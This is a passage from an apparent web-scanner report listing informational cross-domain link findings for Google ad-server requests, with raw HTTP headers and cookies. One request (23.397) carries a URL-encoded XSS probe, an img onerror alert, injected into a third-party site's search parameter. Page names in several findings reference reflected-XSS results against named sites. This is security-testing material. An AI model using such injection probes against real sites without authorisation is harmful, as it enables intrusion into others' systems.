QlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.393. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680295&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html&dt=1303662295456&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303662295468&frm=0&adk=1607234649&ga_vid=1368118632.1303662295&ga_sid=1303662295&ga_hid=433900865&ga_fc=0&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=16&xpc=NFI6O2P1ra&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 16022

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.GoKeyless.com%26adT%3DKeyless%2BLocks%2BOutlet%26adU%3Dwww.appliedtrust.com%26adT%3DWeb-App%2BSecurity%2BJobs%26adU%3Dwww.global-locksmith.com%26adT%3D%252415%2BLocal%2BLocksmiths%2B24/7%26gl%3DUS&amp;usg=AFQjCNEvIQoZ5H4evIjqay97QJDpWg4cTQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.394. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681793&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663793360&bpp=30&shv=r20110420&jsv=r20110415&correlator=1303663793392&frm=1&adk=2614322350&ga_vid=1977842086.1303663793&ga_sid=1303663793&ga_hid=50606524&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815002&fu=4&ifi=1&dtd=1551 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:49:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14798

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BTechnology%2BInc%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26gl%3DUS&amp;usg=AFQjCNGezY0Y3iQ4PlJFd76pOJl6pq5wng" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.395. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679586&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html&dt=1303662595062&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662595073&frm=0&adk=1607234649&ga_vid=1842611603.1303662595&ga_sid=1303662595&ga_hid=820245603&ga_fc=0&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=15&xpc=GbjvmDVQCF&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 16418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Dell.com/Blades%26adT%3DPoweredge%2BServer%26adU%3DAPC.com/DataCenterUniversity%26adT%3DServer%2BRoom%2BHvac%26adU%3Dwww.aberdeeninc.com%26adT%3DUnlimited%2BUnified%2BStorage%26gl%3DUS&amp;usg=AFQjCNFt13LpYbH-Jdd6vmwrIRuNouIfmA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.396. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303689654&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm&dt=1303671928185&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303671928198&frm=0&adk=1819763764&ga_vid=791403455.1303671928&ga_sid=1303671928&ga_hid=1632089863&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1034&bih=907&fu=0&ifi=1&dtd=24&xpc=zdFgMIrVcs&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:05:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BDatabase%2BServer%26adU%3Dgo.SunGardAS.com%26adT%3DColocation%2BSolutions%26adU%3Dwww.Top10HostingList.com%26adT%3DBest%2B10%2BWeb%2BHosting%2BSites%26gl%3DUS&amp;usg=AFQjCNGomRcrkkT4f4lzCKXF3Xvj2fkvvw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.397. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyw%2Fa6d4b%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert(%2522DORK%2522)%253E1a348cd60acord%7D&dt=1303661313775&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661313780&frm=1&adk=2614322350&ga_vid=1362075265.1303661314&ga_sid=1303661314&ga_hid=1595449160&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:08:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_a.php%253Fsearch%253D%25257B%2524keyw/a6d4b%252522%25253E%25253Cimg%252520src%25253Da%252520onerror%25253Dalert(%252522DORK%252522)%25253E1a348cd60acord%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.CreateSpace.com%26adT%3DSelf-Publish%2BYour%2BBook%26adU%3DPeru.travel%26adT%3DWhen%2Btravelling%2Bto%2BPeru%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26gl%3DUS&amp;usg=AFQjCNGpOREK8N6Yq22Wl__M0PGwbjwQ1Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.398. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658421799&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658421824&frm=1&adk=2614322350&ga_vid=2117188423.1303658422&ga_sid=1303658422&ga_hid=1842848419&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813006&fu=4&ifi=1&dtd=33 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_a.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DMercedesHouseNY.com%26adT%3DMercedes%2BHouse%26adU%3Dwww.Cadillac.com/CTS%26adT%3DE350%2Bvs%2BCadillac%2BCTS%26adU%3DMBUSA.com/CPO%26adT%3DCertified%2BPre-Owned%2BEvent%26adU%3Dwww.sprinterpartsdepot.com%26adT%3DMercedes%2BGrille%2BKits%26adU%3DAutoInsurance.Insure.com%26adT%3DMercedes%2BInsurance%2BQuotes%26gl%3DUS&amp;usg=AFQjCNGmy-l5r2Yf2iPhfym_cJyaqYVpUw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.399. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676627&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658627053&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658627058&frm=1&adk=2614322350&ga_vid=1146255573.1303658627&ga_sid=1303658627&ga_hid=479562903&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15194

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/CTS%26adT%3DC350%2Bvs%2BCadillac%2BCTS%26adU%3DMercedes.JustAnswer.com%26adT%3DAsk%2Ba%2BMercedes%2BMechanic%26adU%3DMBUSA.com/CPO%26adT%3DCertified%2BPre-Owned%2BEvent%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dwww.CarMax.com%26adT%3DUsed%2BMercedes%2BSL500%26gl%3DUS&amp;usg=AFQjCNGbXpS6t2w86AZ4nWJng36GiC5vBQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110414/r20110415/measurements.js"></script>
...[SNIP]...

23.400. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:19:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1393

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.401. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
